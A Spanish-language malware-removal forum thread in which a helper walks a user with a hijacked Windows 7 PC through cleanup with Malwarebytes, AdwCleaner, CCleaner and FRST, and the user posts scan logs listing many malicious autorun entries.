Eliminar snorlers

Eliminar Malwares
1

Hola tengo los siguientes problemas y no se como quitarlo.

Al arrancar firefox pone la ruta file:///C:/ProgramData/Snorlers/snp.sc el chrome se abre y se cierra solo y me salen abajo iconos en la barra de programas de un icono con el simbolo de superman.

Podeis echarme un cable?

gracias

2

Hola @Banword bienvenido al Forospyware

Realiza los siguientes pasos, aunque hayas hecho alguno, sin cambiar el orden:

1) Descarga, actualiza y ejecuta Malwarebytes’ Anti-Malware, revisa en detalle el manual, para que sepas usarlo y configurarlo.

  • Realiza un Análisis personalizado, actualizando si te lo pide.
  • Pulsar en “Cuarentena seleccionado” para enviarlo a la cuarentena y Reinicias el sistema.
  • En el apartado del manual Informes :arrow_forward: Informe de análisis encontrarás el reporte de MBAM, clic en Exportar :arrow_forward: Copiar al portapapeles.

2) Descarga AdwCleaner | InfoSpyware en el escritorio.

  • Desactiva temporalmente el Antivirus :arrow_forward: Cómo deshabilitar temporalmente su Antivirus.
  • Cierra también todos los programas que tengas abiertos.
  • Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador".)
  • Pulsar en el botón Escanear, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Limpiar.
  • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
  • Guardas el reporte que te aparecerá, para copiarlo y pegarlo en tu próxima respuesta.
  • El informe también se puede encontrar en C:\AdwCleaner\AdwCleaner[C1].txt

3) Descarga CCleaner

  • Instala Ccleaner
  • Abres Ccleaner en la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine :arrow_forward: clic en ejecutar limpiador
  • Clic en la pestaña Registro :arrow_forward: clic en buscar problemas esperas que termine :arrow_forward: clic en Reparar Seleccionadas y haces una copia de seguridad
  • Vuelves a darle clic en buscar problemas hasta que no encuentre ninguno.

Pega los reportes de Malwarebytes y AdwCleaner y comentas como va el problema.

Un saludo

3

Gracias por responder en el primer programa me dice que windows no tiene acceso al archivo o permisos. Lo he hecho desde el acceso directo y tambien desde la misma carpeta y sale igual. Tanto con doble click como con ejecutar como administrador

# Malwarebytes AdwCleaner 7.4.0.0
# -------------------------------
# Build:    07-23-2019
# Database: 2019-08-27.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    09-01-2019
# Duration: 00:00:01
# OS:       Windows 7 Ultimate
# Cleaned:  24
# Failed:   0


***** [ Services ] *****

Deleted       Main Service

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\MachinerData
Deleted       C:\Users\MrEidrian\AppData\Local\Lavasoft\WEBCOMPANION.EXE_URL_SIQ0LWF3TZGXP2KHFKLLYBK3IDTBEHNG

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
Deleted       C:\Users\MrEidrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Deleted       C:\Users\MrEidrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
Deleted       C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
Deleted       C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Tools\Navegadores\Google Chrome\Google Chrome.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
Deleted       C:\Users\Noelia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
Deleted       C:\Users\Noelia\Desktop\Google Chrome.lnk

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\SCHEDULEDUPDATE

***** [ Registry ] *****

Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
Deleted       HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49C9C2E5-2B93-417B-BD26-29C8EB165164}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{EF758C50-5FA2-4B0A-86D3-8B65B176BC53}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [5887 octets] - [01/09/2019 09:36:39]
AdwCleaner[S01].txt - [4067 octets] - [01/09/2019 09:44:57]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
4

La cosa es mas peliaguda, no se si es a raiz de esto, espero han hecho una compra con mi cuenta de paypal.

Gracias

5

Hola

Sigue los pasos que se indican en este enlace >> Aparece el error "Windows no tiene acceso el dispositivo, ruta de acceso o archivo especificado" al intentar instalar, actualizar o iniciar un programa o archivo - Soporte técnico de Microsoft

Despué de analizar con Malwarebytes continúa con el siguiente paso (aunque siga sin funcionar, analiza con FRST): Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus

Descarga Farbar Recovery Scan Tool.en el escritorio, seleccionando la versión adecuada para la arquitectura(32 o 64bits) de tu equipo. [color=#FF8C00][size=1]:arrow_forward: ¿Cómo saber si mi Windows es de 32 o 64 bits.?[/size][/color]

  • Ejecuta FRST.exe.
  • En el mensaje de la ventana del Disclaimer, pulsamos Yes
  • En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
  • Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Pon los dos reportes generados.

Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(mas de 50.000 caracteres aprox.).

Un saludo

6

Nada no hay manera, he intentado entrar como dicen para los permisos y nada en ningun sitio. Hay creados usuarios de acceso con privilegios.

7

Bueno no se si he conseguido algo pero ahora no sale lo de los permisos. Me sale lo siguiente.

no se pudo iniciar la aplicacion la configuracion en paralelo no es correcta.

Me he metido en el visor de eventos y solo sale la ruta del programa, no que tenga algún problema de versiones o algo de eso.

Pude instalar también el spy hunter 5 aunque dice que hasta 48h no tengo la versión de prueba.

No se que hacer más, me está volviendo loco el jodido virus. Esta el cloudnet y el the good caster

8

Hola

No debiste instalar SpyHunter, si no pagas no te va a servir de mucho.

Pudiste realizar el paso de Frst? Necesito esos reportes para ver que tiene tu PC.

Si no lo puedes descargar en tu equipo, realizalo en otro PC que no esté infectado en un USB y luego la pasas al equipo.

Un saludo

9 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-10-2019 02
Ran by MrEidrian (administrator) on BANWORD (Gigabyte Technology Co., Ltd. P55A-UD4) (18-10-2019 12:01:07)
Running from C:\Users\MrEidrian\Desktop
Loaded Profiles: MrEidrian (Available Profiles: MrEidrian & Noelia)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Windows\SearchIndexer.exe
() [File not signed] C:\Windows\SearchIndexer.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\SpyHunter5.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Piriform Software Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(YANDEX LLC -> YANDEX LLC) C:\Program Files (x86)\Yandex\YandexBrowser\19.7.2.455\service_update.exe
(YANDEX LLC -> YANDEX LLC) C:\Program Files (x86)\Yandex\YandexBrowser\19.7.2.455\service_update.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [7468784 2013-02-28] (Logitech -> Logitech Inc.)
HKLM\...\Run: [BoxSyncHelper] => C:\Program Files\Box Sync\BoxSyncHelper.exe [393216 2013-06-07] (Box, Inc.) [File not signed]
HKLM\...\Run: [iTunesHelper] => E:\Archivos de Programa\iTunes\iTunesHelper.exe [302904 2019-05-07] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\winampa.exe [74752 2012-06-20] (Nullsoft, Inc.) [File not signed]
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [76600 2019-05-03] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [ACPW05EN] => E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\ACDSeeProInTouch2.exe [822384 2011-09-20] (ACD Systems International Inc -> ACD Systems)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766208 2013-08-30] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\RunOnce: [1nzirzyvrg3] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\...\RunOnce: [vw5wpldbi0c] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-20\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672384 2012-04-11] (DT Soft Ltd -> DT Soft Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG -> Nero AG)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [UM] => C:\Users\MrEidrian\AppData\Local\Temp\~wt42D9.tmp.exe [1620224 2017-05-08] (GMGP, LLC -> ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HolyFeather] => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6945495] => C:\Users\MrEidrian\AppData\Local\Temp\is-I1N5O.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9439892] => C:\Users\MrEidrian\AppData\Roaming\k50j3s3jucs\p5ev1tztqfo.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4ILMHV5EZ2V3JE9] => "C:\Program Files\F0MXGHZ02Y\F0MXGHZ02.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7217898] => C:\Users\MrEidrian\AppData\Local\Temp\is-MERL1.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [O125LGFOY3G6T31] => "C:\Program Files\I97ZWYY3EF\I97ZWYY3E.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4743452] => C:\Users\MrEidrian\AppData\Roaming\1nbkkrpf1rp\qfmx3cmi3ih.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [clakem] => C:\Users\MrEidrian\AppData\Local\clakem.dll [16896 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2142673] => C:\Users\MrEidrian\AppData\Roaming\20dlcgoxqtd\ivw5mp0s30m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2086881] => C:\Users\MrEidrian\AppData\Roaming\nuuesycacej\ayqg1aamqpn.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [XMQCG00FHTCRTFT] => "C:\Program Files\Y6WMEPIUSU\TLDU6T8DN.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CVT2BE4AKKPQDC4] => "C:\Program Files\5AK9ESEEM9\0O1G6W4XH.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4182939] => C:\Users\MrEidrian\AppData\Roaming\wt14qozdpuk\qwnay0btejc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1924984] => C:\Users\MrEidrian\AppData\Roaming\xlms1jgbaxg\1nw2ett4lkb.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [EG72O69XGR2NRI3] => "C:\Program Files\FPS3CWAAGI\SEYILWGBG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VQ3JCBJ32B3IDR3] => "C:\Program Files\NV6887IMQU\NV6887IMQ.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7321231] => C:\Users\MrEidrian\AppData\Roaming\gm4bq44ahcr\4dvv12kuxq3.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9740042] => C:\Users\MrEidrian\AppData\Roaming\3xazufz2y4k\4vrehfm0aoc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [FT2B7Y4X2D4BTIN] => "C:\Program Files\F62HX9AXGE\F62HX9AXG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OHM9UGYB0NI0O8G] => "C:\Program Files\4BDF1E44L3\4BDF1E44L.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22714912 2019-08-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1H8A5MXG7UKM4N] => "C:\Program Files\FDHCVOQ991\FDHCVOQ99.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1707178] => C:\Users\MrEidrian\AppData\Roaming\fmxx3sek4uo\p2mstxqpzmv.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8727207] => C:\Users\MrEidrian\AppData\Roaming\nhoccyj3cu3\z21djuxtpah.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [N4V1FFCWTT3R47M] => "C:\Program Files\PI73AD7QWA\PI73AD7QW.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6836345] => C:\Users\MrEidrian\AppData\Roaming\4ts415injby\muaqqm5jd4g.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6780553] => C:\Users\MrEidrian\AppData\Roaming\fie55wruabi\h32b1t0rf2m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1VDIM44SM0XTGBH] => "C:\Program Files\VFS9DXY4DZ\VFS9DXY4D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5K8RSKT0FRWD1U1] => "C:\Program Files\KD8OOK3PXU\FRQVGOT8R.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8013299] => C:\Users\MrEidrian\AppData\Roaming\bq0w0v4ehgl\dneqojihonk.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2CDZK6WEL344Q5F] => "C:\Program Files\IXA6R4G9ZL\IXA6R4G9Z.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5098959] => C:\Users\MrEidrian\AppData\Roaming\pd3l2ezyqrz\lhnvmugbnee.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [D1RO0EW4268PN6X] => "C:\Program Files\79WHBWGJII\79WHBWGJI.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [492184] => "C:\Users\MrEidrian\AppData\Roaming\3jbnls3gby3\2fjvnacax2i.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2963468] => "C:\Users\MrEidrian\AppData\Roaming\fn13p1breks\vnlvulezyz5.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [SZ3KV9NIQILVXI1] => "C:\Program Files\8QTX5BB3DR\8QTX5BB3D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HFMCGA4XKVDRDXC] => "C:\Program Files\8QTX5BB3DR\25A5XF0L8.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803132] => "C:\Users\MrEidrian\AppData\Roaming\gesvmajhlfg\ynuzo1duzmd.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2384361] => "C:\Users\MrEidrian\AppData\Roaming\0detggqes1g\qsfbixptrvg.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7G878VHBN6DN0JZ] => "C:\Program Files\SYKN90SQV7\SYKN90SQV.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [PRC3JU63KR51Q0K] => "C:\Program Files\ZLBV4QGTBO\ZLBV4QGTB.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1ZFNNPAKOAKRTK] => C:\Program Files\V96MUHOC2O\V96MUHOC2.exe [1241600 2019-09-14] (3TD8MEEK5) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ETUGVQRVE0X929G] => "C:\Program Files\PONTMLEVX8\PONTMLEVX.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1139294] => "C:\Users\MrEidrian\AppData\Roaming\oqxiyvagkqg\ihxpu3f52tt.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8215114] => "C:\Users\MrEidrian\AppData\Roaming\ec1hfdjbtxq\ljnddtb4hhv.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CloudNet] => C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-10-18] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {200c15f6-214d-11e9-92c2-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {a8264345-284c-11e9-ae89-6cf049e1b2f6} - I:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {ab69be00-e5c1-11e7-86a6-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\Installer\chrmstp.exe [2019-09-01] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CineForm Status.lnk [2013-09-22]
ShortcutTarget: CineForm Status.lnk -> C:\Program Files (x86)\CineForm\Tools\GoProCineFormStatusViewer.exe (GoPro) [File not signed]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2013-06-09]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [File not signed]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2018-01-20]
ShortcutTarget: MEGAsync.lnk -> C:\ProgramData\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0083E528-8926-47CE-91D9-92F6EA2DE595} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-27] (Google Inc -> Google Inc.)
Task: {0C18376E-CF1F-4DE5-9AB1-9A4AF3883FC0} - System32\Tasks\{33340A00-BC3E-4879-A6B1-0F8A69F911ED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {10A13A2F-DFDC-42A4-8AAA-AB2806A12AE0} - System32\Tasks\{7DF45B6D-4599-459D-9B29-9015D1FFC05C} => C:\Windows\system32\pcalua.exe -a "E:\Archivos de Programa\DNI\CPin\_uninst\uninstaller.exe"
Task: {1DD6BF40-1D14-4D5F-AE7A-4B54E8364AA7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16585328 2019-08-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {1F61FFE7-7027-4558-A257-516CA746C8C4} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-3862230028-3041123482-801023079-1000 => C:\ProgramData\MEGAsync\MEGAupdater.exe [615160 2019-09-14] (Mega Limited -> Mega Limited)
Task: {4A162AA3-469C-4D9E-A12C-2B0C30E8BBAD} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_pepper.exe [1452600 2019-08-14] (Adobe Inc. -> Adobe)
Task: {6FCCE8D2-CFB0-40BA-AB28-85C2EC41B36F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {74B6A54F-133A-4237-970B-54D16592BBED} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-08-14] (Adobe Inc. -> Adobe)
Task: {75A8EB91-7924-4CA3-871B-3F4954BAA4DD} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_Plugin.exe [1457208 2019-08-14] (Adobe Inc. -> Adobe)
Task: {76A23E0D-57BB-48F8-AD0B-66459606DC5D} - System32\Tasks\{A36708C4-9827-440F-94F4-EDD4E0E2D281} => C:\Windows\system32\pcalua.exe -a E:\Juegos\Steam\steam.exe -c steam://uninstall/17080
Task: {84178B8E-D6FB-482F-8DB2-1BDCC2FB6E82} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {8F2ECB93-F014-417C-BDE5-9EFA963D7E95} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MrEidrian\AppData\Roaming\\utctimer\\utc.exe
Task: {974172EE-5163-4B5F-9937-43C67070C014} - System32\Tasks\{FB348B64-F140-4DBE-9F28-F283B92EFEF3} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
Task: {982453F1-781B-4DC2-978D-E90DCE055325} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-08-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {99C90DBF-1668-4D97-9938-AC47BAF117E7} - System32\Tasks\Opera scheduled Autoupdate 1380006602 => E:\Archivos de Programa\Opera\launcher.exe [1348632 2019-09-03] (Opera Software AS -> Opera Software)
Task: {B5B8BC8D-597D-4885-A111-5B0AC028AD21} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
Task: {CFED4984-1DA7-4F67-8A7F-BA086BB4B105} - System32\Tasks\AdobeAAMUpdater-1.0-BANWORD-MrEidrian => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
